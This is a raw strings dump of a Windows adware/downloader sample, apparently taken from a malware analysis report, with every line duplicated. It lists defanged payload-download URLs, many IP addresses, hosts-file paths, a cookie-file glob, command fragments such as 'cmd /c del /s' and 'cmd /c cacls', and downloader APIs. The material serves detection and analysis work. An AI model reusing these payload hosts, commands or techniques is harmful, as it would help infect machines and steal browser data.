219.154.45.66
219.154.45.66
218.28.180.30
218.28.180.30
218.28.65.88
218.28.65.88
125.46.97.42
125.46.97.42
218.29.5.137
218.29.5.137
222.139.212.226
222.139.212.226
218.29.235.22
218.29.235.22
222.88.153.85
222.88.153.85
219.157.127.18
219.157.127.18
218.28.100.230
218.28.100.230
202.110.73.147
202.110.73.147
218.28.117.62
218.28.117.62
222.89.243.106
222.89.243.106
115.55.77.215
115.55.77.215
61.163.33.115
61.163.33.115
61.163.116.186
61.163.116.186
61.54.246.227
61.54.246.227
61.54.225.199
61.54.225.199
218.28.21.75
218.28.21.75
218.28.71.78
218.28.71.78
61.54.246.243
61.54.246.243
222.139.5.81
222.139.5.81
218.29.38.20
218.29.38.20
218.29.5.57
218.29.5.57
182.126.240.8
182.126.240.8
219.154.46.2
219.154.46.2
61.136.115.166
61.136.115.166
219.156.168.50
219.156.168.50
123.13.204.140
123.13.204.140
123.13.206.24
123.13.206.24
219.150.227.19
219.150.227.19
219.150.205.18
219.150.205.18
222.88.195.76
222.88.195.76
125.46.14.164
125.46.14.164
218.28.50.142
218.28.50.142
218.28.8.194
218.28.8.194
171.8.66.16
171.8.66.16
218.29.55.124
218.29.55.124
218.29.214.78
218.29.214.78
115.56.230.218
115.56.230.218
125.46.76.188
125.46.76.188
123.7.178.215
123.7.178.215
219.154.46.102
219.154.46.102
123.101.224.185
123.101.224.185
123.52.127.16
123.52.127.16
61.163.164.45
61.163.164.45
222.139.5.137
222.139.5.137
221.13.152.214
221.13.152.214
218.28.216.146
218.28.216.146
115.56.225.194
115.56.225.194
222.139.6.88
222.139.6.88
@.reloc
@.reloc
w.toQb^
w.toQb^
D:\drivers\
D:\drivers\
hXXp://user.yswm.net/yswm/
hXXp://user.yswm.net/yswm/
hXXp://user.yswm.net/so118/
hXXp://user.yswm.net/so118/
noweb
noweb
\win.ini
\win.ini
\lkfdf\WmiPreSe.exe
\lkfdf\WmiPreSe.exe
cmd /c start
cmd /c start
\073.exe
\073.exe
\sys.dll
\sys.dll
cmd /c del /s
cmd /c del /s
user.yswm.net
user.yswm.net
%System%\drivers\etc\Hosts
%System%\drivers\etc\Hosts
%System%\drivers\etc\Hosts.txt
%System%\drivers\etc\Hosts.txt
\iesafe.dll
\iesafe.dll
\E-yoo\EyooSechelper2.dll
\E-yoo\EyooSechelper2.dll
cmd /c cacls
cmd /c cacls
%Documents and Settings%\%current user%inistrator\
%Documents and Settings%\%current user%inistrator\
8.8.8.8
8.8.8.8
hXXp://yxtt.v138.net/send/jwclose/kill.txt
hXXp://yxtt.v138.net/send/jwclose/kill.txt
hXXp://VVV.v138.net/ycdel.asp?action=ser&username=
hXXp://VVV.v138.net/ycdel.asp?action=ser&username=
wb2014.oicp.net
wb2014.oicp.net
hXXp://VVV.yswm.net/ycdel.asp?action=ser&username=wenhua-
hXXp://VVV.yswm.net/ycdel.asp?action=ser&username=wenhua-
liuyingkyu.eicp.net
liuyingkyu.eicp.net
~DFA1039.tmp
~DFA1039.tmp
218.22.219.42@218.22.219.2
218.22.219.42@218.22.219.2
hXXp://yxtt.v138.net/send/jwclose/app.txt
hXXp://yxtt.v138.net/send/jwclose/app.txt
hXXp://down.v718.com/073.exe
hXXp://down.v718.com/073.exe
hXXp://down.v718.com/svchost.exe
hXXp://down.v718.com/svchost.exe
\xcfde.exe
\xcfde.exe
hXXp://down.v718.com/666.exe
hXXp://down.v718.com/666.exe
hXXp://yxtt.v138.net/send/jwclose/qqtang.txt
hXXp://yxtt.v138.net/send/jwclose/qqtang.txt
hXXp://down06.gdicoou.com:5505/updata/adclient/client/2921ico.exe
hXXp://down06.gdicoou.com:5505/updata/adclient/client/2921ico.exe
hXXp://down.v718.com/qqtang.exe
hXXp://down.v718.com/qqtang.exe
\1599.exe
\1599.exe
\1671.exe
\1671.exe
hXXp://down.v718.com/1671.exe
hXXp://down.v718.com/1671.exe
\1150.exe
\1150.exe
\1600.exe
\1600.exe
\1672.exe
\1672.exe
\1655.exe
\1655.exe
\szicoad.exe
\szicoad.exe
hXXp://down06.gdicoou.com:5505/updata/adclient/client/2920ico.exe
hXXp://down06.gdicoou.com:5505/updata/adclient/client/2920ico.exe
hXXp://down.v718.com/apphftts.exe
hXXp://down.v718.com/apphftts.exe
hXXp://down.v718.com/appinst.exe
hXXp://down.v718.com/appinst.exe
hXXp://down.v718.com/niulock.exe
hXXp://down.v718.com/niulock.exe
flash.exe
flash.exe
hXXp://down.v718.com/remove.exe
hXXp://down.v718.com/remove.exe
hXXp://down.v718.com/hook.dll
hXXp://down.v718.com/hook.dll
\system32\browse1c.dllbak
\system32\browse1c.dllbak
\system32\browse1c.dll
\system32\browse1c.dll
hXXp://mactj.v138.net/mactj.asp?mac=
hXXp://mactj.v138.net/mactj.asp?mac=
223.244.230.186
223.244.230.186
hXXp://yxtt.v138.net/send/jwclose/yswm.txt
hXXp://yxtt.v138.net/send/jwclose/yswm.txt
hXXp://down.v718.com/addjc.dll
hXXp://down.v718.com/addjc.dll
ystb.Favorites
ystb.Favorites
conime.exe
conime.exe
hXXp://VVV.topyouxi.net/newcor.dll
hXXp://VVV.topyouxi.net/newcor.dll
hXXp://down.v718.com/exitpop.dll
hXXp://down.v718.com/exitpop.dll
yswm.gamepop
yswm.gamepop
hXXp://down.v718.com/ico.dll
hXXp://down.v718.com/ico.dll
yswm.ico
yswm.ico
lockie.ini
lockie.ini
JianGuanUrl
JianGuanUrl
webfile
webfile
\system\lock.dat
\system\lock.dat
\system32\gdi30.dll
\system32\gdi30.dll
\system32\lockie.ini
\system32\lockie.ini
hXXp://down.v718.com/lock.dll
hXXp://down.v718.com/lock.dll
hXXp://down.v718.com/lock.exe
hXXp://down.v718.com/lock.exe
hXXp://down.v718.com/lock2.exe
hXXp://down.v718.com/lock2.exe
yszy.lockie
yszy.lockie
config.ini
config.ini
hXXp://down.v718.com/hbxzctp.exe
hXXp://down.v718.com/hbxzctp.exe
hXXp://down.v718.com/sgtp.exe
hXXp://down.v718.com/sgtp.exe
hXXp://down.v718.com/sgtp2.exe
hXXp://down.v718.com/sgtp2.exe
hXXp://VVV.yswm.net/ip.asp
hXXp://VVV.yswm.net/ip.asp
hXXp://iframe.ip138.com/ic.asp
hXXp://iframe.ip138.com/ic.asp
The specified file is either a named or anonymous pipe
The specified file is either a named or anonymous pipe
Cookies\*.*
Cookies\*.*
ids.exe
ids.exe
-url:http:
-url:http:
minie.exe
minie.exe
anhui-000001.exe
anhui-000001.exe
netbar.exe
netbar.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
1.vbp
1.vbp
yswm.runsoft
yswm.runsoft
yswm.exe
yswm.exe
%original file name%.exe_516_rwx_02561000_0005E000:
8%u(j
8%u(j
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
.PjRW
.PjRW
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
operator
operator
GetProcessWindowStation
GetProcessWindowStation
%d * %d
%d * %d
hXXp://yxtt.v138.net/send/yxjtc/yxjtz.htm
hXXp://yxtt.v138.net/send/yxjtc/yxjtz.htm
hXXp://yxtt.v138.net/send/yxjtc/yxjup.htm
hXXp://yxtt.v138.net/send/yxjtc/yxjup.htm
IWebBrowser2
IWebBrowser2
IWebBrowser2
IWebBrowser2
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
RegDeleteKeyExW
\svn\InsertWnd\Release\InsertWnd.pdb
\svn\InsertWnd\Release\InsertWnd.pdb
zcÃ
zcÃ
c:\%original file name%.exe
c:\%original file name%.exe
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegCloseKey
RegCloseKey
RegDeleteKeyW
RegDeleteKeyW
URLDownloadToFileW
URLDownloadToFileW
EnumChildWindows
EnumChildWindows
EnumWindows
EnumWindows
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
64l.Qp
64l.Qp
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
combase.dll
combase.dll
kernel32.dll
kernel32.dll
mscoree.dll
mscoree.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
USER32.DLL
USER32.DLL
portuguese-brazilian
portuguese-brazilian
hXXp://yxtt.v138.net/send/InsertWnd.txt
hXXp://yxtt.v138.net/send/InsertWnd.txt
hXXp://yxtt.v138.net/send/yxjk/jzyxj.txt
hXXp://yxtt.v138.net/send/yxjk/jzyxj.txt
hXXp://yxtt.v138.net/send/InsertWnd_2345title_en.dll
hXXp://yxtt.v138.net/send/InsertWnd_2345title_en.dll
InsertWnd_2345title_en LoadLibrary DLLResLib.dll
InsertWnd_2345title_en LoadLibrary DLLResLib.dll
E:\projects\InsertWnd\%s\Debug\Demo.exe
E:\projects\InsertWnd\%s\Debug\Demo.exe
E:\projects\InsertWnd\%s\Release\Demo.exe
E:\projects\InsertWnd\%s\Release\Demo.exe
20151231
20151231
insert.txt
insert.txt
insert.tmp
insert.tmp
id:%s
id:%s
shell.Explorer.2
shell.Explorer.2
CreateInteriorIE %X %s
CreateInteriorIE %X %s
%s Navigate() -> m_pWeb
%s Navigate() -> m_pWeb
%s Navigate() -> m_axWnd.m_hWnd
%s Navigate() -> m_axWnd.m_hWnd
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
%X %s m_pWeb->Navigate %s
%X %s m_pWeb->Navigate %s
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
WAdvapi32.dll
WAdvapi32.dll
[M/d/d d:d:d.d]
[M/d/d d:d:d.d]
chrome
chrome
firefox
firefox
%X %s
%X %s
%original file name%.exe_516_rwx_02631000_0004D000:
uDPPPh
uDPPPh
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
.PjRW
.PjRW
61.132.227.24
61.132.227.24
IP:61.132.227.24,
IP:61.132.227.24,
&8.8.8.8^
&8.8.8.8^
hXXp://
hXXp://
iexplore.exe
iexplore.exe
)^swclickmsg^icoJC*
)^swclickmsg^icoJC*
\~IcsaVas32.tmp
\~IcsaVas32.tmp
hXXp://yxtt.yswm.net/send/ico2safe.txt
hXXp://yxtt.yswm.net/send/ico2safe.txt
\~IcVas32.tmp
\~IcVas32.tmp
hXXp://yxtt.v138.net/send/dzjck/hzico.txt
hXXp://yxtt.v138.net/send/dzjck/hzico.txt
hXXp://yxtt.yswm.net/send/ico2.txt
hXXp://yxtt.yswm.net/send/ico2.txt
C:\Windows\Media
C:\Windows\Media
%Program Files%
%Program Files%
\xsend.tmp
\xsend.tmp
%Y-%m-%d %H:%M:%S
%Y-%m-%d %H:%M:%S
%Y%m%d%H
%Y%m%d%H
\system\~DF3812.TMP
\system\~DF3812.TMP
hXXp://zmtb.yswm.net/Send.asp?id=
hXXp://zmtb.yswm.net/Send.asp?id=
\~icabc.dfa
\~icabc.dfa
\~coicdk.tmp
\~coicdk.tmp
hXXp://zmtb.yswm.net/xadf/config.txt
hXXp://zmtb.yswm.net/xadf/config.txt
hXXp://zmtb.yswm.net/jx/config.txt
hXXp://zmtb.yswm.net/jx/config.txt
hXXp://zmtb.yswm.net/config.txt
hXXp://zmtb.yswm.net/config.txt
hXXp://down.v718.com/ysIco/config.txt
hXXp://down.v718.com/ysIco/config.txt
hXXp://yxtt.v138.net/send/ico/hnico.txt
hXXp://yxtt.v138.net/send/ico/hnico.txt
hXXp://yxtt.v138.net/send/ico/lhmico.txt
hXXp://yxtt.v138.net/send/ico/lhmico.txt
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
GetProcessWindowStation
GetProcessWindowStation
operator
operator
E:\work\fpProject\
E:\work\fpProject\
\src\IcoJc\Release\IcoJc.pdb
\src\IcoJc\Release\IcoJc.pdb
%WinDir%
%WinDir%
zcÃ
zcÃ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\xsend.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\xsend.tmp
c:\%original file name%.exe
c:\%original file name%.exe
[{000214A0-0000-0000-C000-000000000046}]
[{000214A0-0000-0000-C000-000000000046}]
URL=hXXp://VVV.apyw.net/sy2/
URL=hXXp://VVV.apyw.net/sy2/
HotKey=0
HotKey=0
.rsrc
.rsrc
Y}nnÃŒHYC
Y}nnÃŒHYC
OUU%x
OUU%x
true
true
KERNEL32.DLL
KERNEL32.DLL
GetProcessHeap
GetProcessHeap
WinExec
WinExec
GetCPInfo
GetCPInfo
ShellExecuteA
ShellExecuteA
InternetOpenUrlA
InternetOpenUrlA
.text
.text
`.rdata
`.rdata
@.data
@.data
@.reloc
@.reloc
ex.ab
ex.ab
kernel32.dll
kernel32.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
mscoree.dll
mscoree.dll
USER32.DLL
USER32.DLL
portuguese-brazilian
portuguese-brazilian
%original file name%.exe_516_rwx_02691000_00063000:
operator
operator
GetProcessWindowStation
GetProcessWindowStation
E:\projects\DLLResLib\Release\DLLResLib.pdb
E:\projects\DLLResLib\Release\DLLResLib.pdb
zcÃ
zcÃ
c:\%original file name%.exe
c:\%original file name%.exe
11032135
11032135
110430-90
110430-90
2010-2011
2010-2011
2011-2012
2011-2012
20110217
20110217
20110225
20110225
2012-2013
2012-2013
83319111
83319111
20130901
20130901
EXOsShowTime
EXOsShowTime
EXOsShowTime2013
EXOsShowTime2013
SSHOWTIME
SSHOWTIME
GagConcert
GagConcert
-2011114
-2011114
-20111121
-20111121
-20111123
-20111123
-20111128
-20111128
-2011115
-2011115
VividRedOperation
VividRedOperation
WeBareBears
WeBareBears
2013-2014
2013-2014
MissHOKUSAI
MissHOKUSAI
0072014
0072014
5202012
5202012
primopasso
primopasso
secondpasso
secondpasso
-XTREMEXECUTOR
-XTREMEXECUTOR
TheConcert
TheConcert
2014-2015
2014-2015
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
%original file name%.exe_516_rwx_11001000_0002E000:
vb6chs.dll
vb6chs.dll
MSWINSCK.OCX
MSWINSCK.OCX
MSWinsockLib.Winsock
MSWinsockLib.Winsock
AccUDP
AccUDP
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%System%\msvbvm60.dll\3
%System%\msvbvm60.dll\3
urlmon
urlmon
URLDownloadToFileA
URLDownloadToFileA
DownUrl
DownUrl
VBA6.DLL
VBA6.DLL
epldrive.dll
epldrive.dll
mksparse.dll
mksparse.dll
DiskVolume.dll
DiskVolume.dll
oleaut32.dll
oleaut32.dll
shell32.dll
shell32.dll
winmm.dll
winmm.dll
X%System%\MSWINSCK.oca
X%System%\MSWINSCK.oca
advapi32.dll
advapi32.dll
ws2_32.dll
ws2_32.dll
wsock32.dll
wsock32.dll
LocalPort
LocalPort
RemotePort
RemotePort
WSOCK32.DLL
WSOCK32.DLL
USER32.DLL
USER32.DLL
127.0.0.1
127.0.0.1
BakUrl
BakUrl
uMsg
uMsg
lngPort
lngPort
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
kEyH
kEyH
9/}Cmd
9/}Cmd
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
\SoftP2P
\SoftP2P
2\P2P.vbp
2\P2P.vbp
hXXp://download.cpudln.com/8/ad15712.exe
hXXp://download.cpudln.com/8/ad15712.exe
c:\3.exe
c:\3.exe
hXXp://117.79.80.169/ad15712.exe
hXXp://117.79.80.169/ad15712.exe
\~DFA90A3.TMP
\~DFA90A3.TMP
255.255.255.255
255.255.255.255
The specified file is either a named or anonymous pipe
The specified file is either a named or anonymous pipe
c:\windows\lock.log
c:\windows\lock.log
Windows Sockets version
Windows Sockets version
is not supported by winsock.dll
is not supported by winsock.dll
supported sockets.
supported sockets.
SendUDP
SendUDP
Get Url:
Get Url:
123111123123
123111123123
CSocketMaster.RemotePort
CSocketMaster.RemotePort
Invalid operation at current state
Invalid operation at current state
The argument passed to a function was not in the correct format or in the specified range.
The argument passed to a function was not in the correct format or in the specified range.
CSocketMaster.RemoteHost
CSocketMaster.RemoteHost
CSocketMaster.LocalPort
CSocketMaster.LocalPort
CSocketMaster.Protocol
CSocketMaster.Protocol
CSocketMaster.DestroySocket
CSocketMaster.DestroySocket
CSocketMaster.SocketExists
CSocketMaster.SocketExists
CSocketMaster.Connect
CSocketMaster.Connect
Unsupported variant type.
Unsupported variant type.
CSocketMaster.PostSocket
CSocketMaster.PostSocket
CSocketMaster.ConnectToIP
CSocketMaster.ConnectToIP
CSocketMaster.Bind
CSocketMaster.Bind
CSocketMaster.BindInternal
CSocketMaster.BindInternal
PORT:
PORT:
CSocketMaster.SendData
CSocketMaster.SendData
CSocketMaster.GetLocalHostName
CSocketMaster.GetLocalHostName
CSocketMaster.GetLocalIP
CSocketMaster.GetLocalIP
CSocketMaster.ResolveIfHostname
CSocketMaster.ResolveIfHostname
CSocketMaster.SendBufferedDataUDP
CSocketMaster.SendBufferedDataUDP
CSocketMaster.SendBufferedData
CSocketMaster.SendBufferedData
CSocketMaster.RecvDataToBuffer
CSocketMaster.RecvDataToBuffer
CSocketMaster.ProcessOptions
CSocketMaster.ProcessOptions
CSocketMaster.GetData
CSocketMaster.GetData
CSocketMaster.PeekData
CSocketMaster.PeekData
CSocketMaster.RecvData
CSocketMaster.RecvData
CSocketMaster.Listen
CSocketMaster.Listen
CSocketMaster.Accept
CSocketMaster.Accept
modSocketMaster.InitiateProcesses
modSocketMaster.InitiateProcesses
modSocketMaster.FinalizeProcesses
modSocketMaster.FinalizeProcesses
Address family not supported by protocol family.
Address family not supported by protocol family.
Operation already in progress.
Operation already in progress.
Operation now in progress.
Operation now in progress.
Socket operation on nonsocket.
Socket operation on nonsocket.
Operation not supported.
Operation not supported.
Protocol family not supported.
Protocol family not supported.
Protocol not supported.
Protocol not supported.
Socket type not supported.
Socket type not supported.
Winsock.dll version out of range.
Winsock.dll version out of range.
modSocketMaster.DestroyWinsockMessageWindow
modSocketMaster.DestroyWinsockMessageWindow
modSocketMaster.RegisterSocket
modSocketMaster.RegisterSocket